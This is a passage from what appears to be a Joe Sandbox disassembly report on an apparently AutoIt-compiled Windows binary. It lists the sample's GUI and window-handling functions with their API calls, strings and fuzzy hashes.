Instruction Fuzzy Hash: 6F41D4729002157FDB14BA74EC47EFF776CDF41720F04046AF905A6182EE79EA01B6A6

Function 00F027D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F028BC
GetSystemMetrics.USER32(00000007), ref: 00F028C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F028EF
GetSystemMetrics.USER32(00000008), ref: 00F028F7
GetSystemMetrics.USER32(00000004), ref: 00F0291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F02939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F02949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F0297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F02990
GetClientRect.USER32(00000000,000000FF), ref: 00F029AE
GetStockObject.GDI32(00000011), ref: 00F029CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00F029D5

Part of subcall function 00F02344: GetCursorPos.USER32(?), ref: 00F02357
Part of subcall function 00F02344: ScreenToClient.USER32(00FC57B0,?), ref: 00F02374
Part of subcall function 00F02344: GetAsyncKeyState.USER32(00000001), ref: 00F02399
Part of subcall function 00F02344: GetAsyncKeyState.USER32(00000002), ref: 00F023A7

SetTimer.USER32(00000000,00000000,00000028,00F01256), ref: 00F029FC

Strings

AutoIt v3 GUI, xrefs: 00F02974

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: a34646d1f2c65d63fabf768216366bcf828f123bae72e712b7bdd8d7f6d4e5e9
Instruction ID: 9b0ab8b1e51816796e6d0edc8973177c1c27eb58ea3a51b4d861d65126043faa
Opcode Fuzzy Hash: a34646d1f2c65d63fabf768216366bcf828f123bae72e712b7bdd8d7f6d4e5e9
Instruction Fuzzy Hash: D7B13E75A0020ADFDB14DF68DD49BAE7BA4FB08724F104129FA15E72D0DB74A854FB60

Function 00F83DE2 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00F83E6F
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F83F2F

Strings

GETSELECTEDCOUNT, xrefs: 00F83F12
SELECT, xrefs: 00F83FC9
DESELECT, xrefs: 00F8401D
ISSELECTED, xrefs: 00F83F3A
FINDITEM, xrefs: 00F840A2
VIEWCHANGE, xrefs: 00F840EE
GETITEMCOUNT, xrefs: 00F83EA1
GETSELECTED, xrefs: 00F8405D
SELECTCLEAR, xrefs: 00F83FAE
SELECTALL, xrefs: 00F83F96
GETSUBITEMCOUNT, xrefs: 00F83EBA
SELECTINVERT, xrefs: 00F83FFF
GETTEXT, xrefs: 00F83ED8

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: dcc59dc55d35dc4d4cf65db46c718fe49882342cbdfce385e71a962ae5a32119
Instruction ID: b8bcc1661dc64383aa241a3052c3e9781574ac63fdf96c4356139f2647ad1e3e
Opcode Fuzzy Hash: dcc59dc55d35dc4d4cf65db46c718fe49882342cbdfce385e71a962ae5a32119
Instruction Fuzzy Hash: 7EA1A0716183019BCB04FF10CC51AAA73A5AF85324F54886CB9A69B3D3DB78ED09FB41

Function 00F5A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00F5A47A
__swprintf.LIBCMT ref: 00F5A51B
_wcscmp.LIBCMT ref: 00F5A52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00F5A583
_wcscmp.LIBCMT ref: 00F5A5BF
GetClassNameW.USER32(?,?,00000400), ref: 00F5A5F6
GetDlgCtrlID.USER32(?), ref: 00F5A648
GetWindowRect.USER32(?,?), ref: 00F5A67E
GetParent.USER32(?), ref: 00F5A69C
ScreenToClient.USER32(00000000), ref: 00F5A6A3
GetClassNameW.USER32(?,?,00000100), ref: 00F5A71D
_wcscmp.LIBCMT ref: 00F5A731
GetWindowTextW.USER32(?,?,00000400), ref: 00F5A757
_wcscmp.LIBCMT ref: 00F5A76B

Part of subcall function 00F2362C: _iswctype.LIBCMT ref: 00F23634

Strings

%s%u, xrefs: 00F5A515

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 1f6ce8ab2c3219975271523ad9190b86e90076f68af17de3a866730cc9622b1f
Instruction ID: 68f60fc51a0c42ec798f82d32048a775cbf326b2372ad3b031793dcf2d04c2bc
Opcode Fuzzy Hash: 1f6ce8ab2c3219975271523ad9190b86e90076f68af17de3a866730cc9622b1f
Instruction Fuzzy Hash: 69A1D571604706AFD714DF60D884FAAB7E8FF48312F044629FE99C2150E734E969EB92

Function 00F5AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00F5AF18
_wcscmp.LIBCMT ref: 00F5AF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 00F5AF51
CharUpperBuffW.USER32(?,00000000), ref: 00F5AF6E
_wcscmp.LIBCMT ref: 00F5AF8C
_wcsstr.LIBCMT ref: 00F5AF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00F5AFD5
_wcscmp.LIBCMT ref: 00F5AFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 00F5B00C
GetClassNameW.USER32(00000018,?,00000400), ref: 00F5B055
_wcscmp.LIBCMT ref: 00F5B065
GetClassNameW.USER32(00000010,?,00000400), ref: 00F5B08D
GetWindowRect.USER32(00000004,?), ref: 00F5B0F6

Strings

ThumbnailClass, xrefs: 00F5AFE0, 00F5B060
@, xrefs: 00F5AEF9

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: d8534f31a87eed416a3e1dedc064c8dae9fe7af091237a1dab1d7e9f2af55620
Instruction ID: 0604bd9cac8f2d1691b708b30a14037cb9722939ff0bcadb2fe7c16eb31423b5
Opcode Fuzzy Hash: d8534f31a87eed416a3e1dedc064c8dae9fe7af091237a1dab1d7e9f2af55620
Instruction Fuzzy Hash: 2C81B0715083099FDB04DF10C885FAA7BD8EF84325F14856AFE858A092DB34DD4DEBA1

Function 00F5ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00F5AC33

Strings

[HANDLE:, xrefs: 00F5AC3F
HANDLE=, xrefs: 00F5AC2C
[LAST, xrefs: 00F5ACE0
ALL, xrefs: 00F5ACC7
[REGEXPTITLE:, xrefs: 00F5AC5B
[ACTIVE, xrefs: 00F5AC20
[CLASS:, xrefs: 00F5AC83
REGEXP=, xrefs: 00F5AC48
ACTIVE, xrefs: 00F5AC0E
LAST, xrefs: 00F5ABF8
[ALL, xrefs: 00F5ACD9
CLASSNAME=, xrefs: 00F5AC70

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 1918c2ee1e05a466b7526502e2c65658990d045dcbbc1d2bbc16efb8f4ad6606
Instruction ID: 4de915eb6bb489914aacb70e2036a869565f1169e2e93fc936805f04e690f6ef
Opcode Fuzzy Hash: 1918c2ee1e05a466b7526502e2c65658990d045dcbbc1d2bbc16efb8f4ad6606
Instruction Fuzzy Hash: 7131C271A48309ABDB00FA61DD07EEE7768AF10721F600558F902710E1EF59EF18BA53

Function 00F74FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00F75013
LoadCursorW.USER32(00000000,00007F00), ref: 00F7501E
LoadCursorW.USER32(00000000,00007F03), ref: 00F75029
LoadCursorW.USER32(00000000,00007F8B), ref: 00F75034
LoadCursorW.USER32(00000000,00007F01), ref: 00F7503F
LoadCursorW.USER32(00000000,00007F81), ref: 00F7504A
LoadCursorW.USER32(00000000,00007F88), ref: 00F75055
LoadCursorW.USER32(00000000,00007F80), ref: 00F75060
LoadCursorW.USER32(00000000,00007F86), ref: 00F7506B
LoadCursorW.USER32(00000000,00007F83), ref: 00F75076
LoadCursorW.USER32(00000000,00007F85), ref: 00F75081
LoadCursorW.USER32(00000000,00007F82), ref: 00F7508C
LoadCursorW.USER32(00000000,00007F84), ref: 00F75097
LoadCursorW.USER32(00000000,00007F04), ref: 00F750A2
LoadCursorW.USER32(00000000,00007F02), ref: 00F750AD
LoadCursorW.USER32(00000000,00007F89), ref: 00F750B8
GetCursorInfo.USER32(?), ref: 00F750C8

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 068d06b3470143ba37081bc6f9c53a631e486ced65da485540d1f5d79f57e324
Instruction ID: d8c3b3dcfca958b3a4a6ce838ee94567573a66915bfeaade1f11dd6433a3be71
Opcode Fuzzy Hash: 068d06b3470143ba37081bc6f9c53a631e486ced65da485540d1f5d79f57e324
Instruction Fuzzy Hash: EE31F6B1D4831E6ADF109FB69C8996EBFE8FF04750F50452BA50DE7280DAB8A5009F91

Function 00F8A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F8A259
DestroyWindow.USER32(?,?), ref: 00F8A2D3

Part of subcall function 00F07BCC: _memmove.LIBCMT ref: 00F07C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F8A34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F8A36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F8A382
DestroyWindow.USER32(00000000), ref: 00F8A3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F00000,00000000), ref: 00F8A3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F8A3F4
GetDesktopWindow.USER32 ref: 00F8A40D
GetWindowRect.USER32(00000000), ref: 00F8A414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F8A42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F8A444

Part of subcall function 00F025DB: GetWindowLongW.USER32(?,000000EB), ref: 00F025EC

Strings

0, xrefs: 00F8A26F
tooltips_class32, xrefs: 00F8A346, 00F8A3D4

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 5d99135c51ba94bc446864a21c4956065ea22aaf17284ab537a74785241a30d0
Instruction ID: 175ba3d99c986e4e76769b43a4a207e8fa6f81273f7760f865ff783511039a8b
Opcode Fuzzy Hash: 5d99135c51ba94bc446864a21c4956065ea22aaf17284ab537a74785241a30d0
Instruction Fuzzy Hash: B771DF70540208AFEB20DF28CC49FAA7BE5FB88710F04452DF985872B0D775E94AEB52

Function 00F8C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623

DragQueryPoint.SHELL32(?,?), ref: 00F8C627

Part of subcall function 00F8AB37: ClientToScreen.USER32(?,?), ref: 00F8AB60
Part of subcall function 00F8AB37: GetWindowRect.USER32(?,?), ref: 00F8ABD6
Part of subcall function 00F8AB37: PtInRect.USER32(?,?,00F8C014), ref: 00F8ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 00F8C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F8C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F8C6BE
_wcscat.LIBCMT ref: 00F8C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F8C705
SendMessageW.USER32(?,000000B0,?,?), ref: 00F8C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 00F8C735
SendMessageW.USER32(?,000000B1,?,?), ref: 00F8C757
DragFinish.SHELL32(?), ref: 00F8C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00F8C851

Strings

@GUI_DRAGFILE, xrefs: 00F8C800
@GUI_DROPID, xrefs: 00F8C77E
@GUI_DRAGID, xrefs: 00F8C7C9

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 3c49c86e30f236757b42bab7ad8acac3cc82972ebc7f3aa2ac6257e74e93637f
Instruction ID: a5756730cecac3da1cd6b35e9a73cf308a940960e7c56c82ce0b41a32f3c5a36
Opcode Fuzzy Hash: 3c49c86e30f236757b42bab7ad8acac3cc82972ebc7f3aa2ac6257e74e93637f
Instruction Fuzzy Hash: C8618F71508305AFC701EF64CC85DAFBBE8EF89750F40092EF595922A1DB70E949EB52

Function 00F84392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00F84424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F8446F

Strings

EXPAND, xrefs: 00F84521
SELECT, xrefs: 00F84620
CHECK, xrefs: 00F8448F
COLLAPSE, xrefs: 00F844B5
GETSELECTED, xrefs: 00F8457F
UNCHECK, xrefs: 00F8464B
GETITEMCOUNT, xrefs: 00F84551
ISCHECKED, xrefs: 00F845F2
GETTOTALCOUNT, xrefs: 00F84456
GETTEXT, xrefs: 00F845C2
EXISTS, xrefs: 00F844D8

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 0d66072caed4dd705b8718583935fa1929cc0bf9ad2ed26dacbbbe7405cc4af4
Instruction ID: 85ee1cbd2e015207e06da368093de37254b322618e1cb4bf8551c01053c76bc9
Opcode Fuzzy Hash: 0d66072caed4dd705b8718583935fa1929cc0bf9ad2ed26dacbbbe7405cc4af4
Instruction Fuzzy Hash: 6C915D716083129FCB04EF10C851AAEB7E1AF95350F44846CE8965B3A3DB78ED09FB81

Function 00F8B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F8B8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00F891C2), ref: 00F8B910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F8B949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00F8B98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F8B9C3
FreeLibrary.KERNEL32(?), ref: 00F8B9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F8B9DF
DestroyIcon.USER32(?,?,?,?,?,00F891C2), ref: 00F8B9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F8BA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F8BA17

Part of subcall function 00F22EFD: __wcsicmp_l.LIBCMT ref: 00F22F86

Strings

.exe, xrefs: 00F8B84A
.dll, xrefs: 00F8B86D
.icl, xrefs: 00F8B82A

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 3070f30a52925c3d256bfd40182216569955a2b75f5ab969ea9ad6cf6c5760ed
Instruction ID: 260ee737c6a48c6b7948af1b623963f97fb7ef124fe758200b0c66fe8e72b7e8
Opcode Fuzzy Hash: 3070f30a52925c3d256bfd40182216569955a2b75f5ab969ea9ad6cf6c5760ed
Instruction Fuzzy Hash: 3761F071900219BEEB14EF64DC45FFE7BA8EB08721F108115FA11D61C1DBB49A84FBA0

Function 00F6DC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00F6DCDC
SystemTimeToFileTime.KERNEL32(?,?), ref: 00F6DCEC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F6DCF8
__wsplitpath.LIBCMT ref: 00F6DD56
_wcscat.LIBCMT ref: 00F6DD6E
_wcscat.LIBCMT ref: 00F6DD80
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F6DD95
SetCurrentDirectoryW.KERNEL32(?), ref: 00F6DDA9
SetCurrentDirectoryW.KERNEL32(?), ref: 00F6DDDB
SetCurrentDirectoryW.KERNEL32(?), ref: 00F6DDFC
_wcscpy.LIBCMT ref: 00F6DE08
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F6DE47

Strings

*.*, xrefs: 00F6DE02

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 0f13ab23af5a96bbda245be35485a9386e270329c771fed2d14cee8e32959360
Instruction ID: d39c046fd308b56850b10182f9546cc1e08bf0d0f5b2d39f3c46ea6d6c85d163
Opcode Fuzzy Hash: 0f13ab23af5a96bbda245be35485a9386e270329c771fed2d14cee8e32959360
Instruction Fuzzy Hash: 9B6171B2A043059FCB10EF60C8449AEB7E8FF89324F04891DF989D7251EB75E945EB52

Function 00F69C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00F69C7F

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00F69CA0
__swprintf.LIBCMT ref: 00F69CF9
__swprintf.LIBCMT ref: 00F69D12
_wprintf.LIBCMT ref: 00F69DB9
_wprintf.LIBCMT ref: 00F69DD7

Strings

"%s" (%d) : ==> %s:, xrefs: 00F69DD2
Error: , xrefs: 00F69D81
Line %d (File "%s"):, xrefs: 00F69CF3, 00F69D0C
Incorrect parameters to object property !, xrefs: 00F69D5B
"%s" (%d) : ==> %s:%s%s, xrefs: 00F69DB4
^ ERROR , xrefs: 00F69D4E

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 09437c00546fffc2a5bedb3a76d322948d48309ae4a5e4c09054faca9a984414
Instruction ID: 10b417c67f339f5a1393636a006e22fd5efe7f59199f7e2f0fc074e4b79f227a
Opcode Fuzzy Hash: 09437c00546fffc2a5bedb3a76d322948d48309ae4a5e4c09054faca9a984414
Instruction Fuzzy Hash: 2B518B72D0060AAADF14FBE0DD46EEEB778EF14700F1000A5B505720A1EB796E59FB61

Function 00F6A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00F09837: __itow.LIBCMT ref: 00F09862
Part of subcall function 00F09837: __swprintf.LIBCMT ref: 00F098AC

CharLowerBuffW.USER32(?,?), ref: 00F6A3CB
GetDriveTypeW.KERNEL32 ref: 00F6A418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F6A460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F6A497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F6A4C5

Part of subcall function 00F07BCC: _memmove.LIBCMT ref: 00F07C06

Strings

open , xrefs: 00F6A427
open, xrefs: 00F6A3F2
close cd wait, xrefs: 00F6A4B0
